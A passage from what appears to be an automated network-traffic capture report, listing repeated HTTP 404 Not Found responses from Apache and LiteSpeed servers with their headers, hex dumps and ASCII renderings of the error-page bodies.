72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:24:16 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:24:19 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Sun, 24 Nov 2024 07:24:41 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Sun, 24 Nov 2024 07:24:44 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Sun, 24 Nov 2024 07:24:47 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Sun, 24 Nov 2024 07:24:49 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sun, 24 Nov 2024 07:24:57 GMTserver: LiteSpeedstrict-transport-security: max-age=63072000; includeSubDomainsx-frame-options: SAMEORIGINx-content-type-options: nosniffData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sun, 24 Nov 2024 07:24:59 GMTserver: LiteSpeedstrict-transport-security: max-age=63072000; includeSubDomainsx-frame-options: SAMEORIGINx-content-type-options: nosniffData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sun, 24 Nov 2024 07:25:02 GMTserver: LiteSpeedstrict-transport-security: max-age=63072000; includeSubDomainsx-frame-options: SAMEORIGINx-content-type-options: nosniffData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background
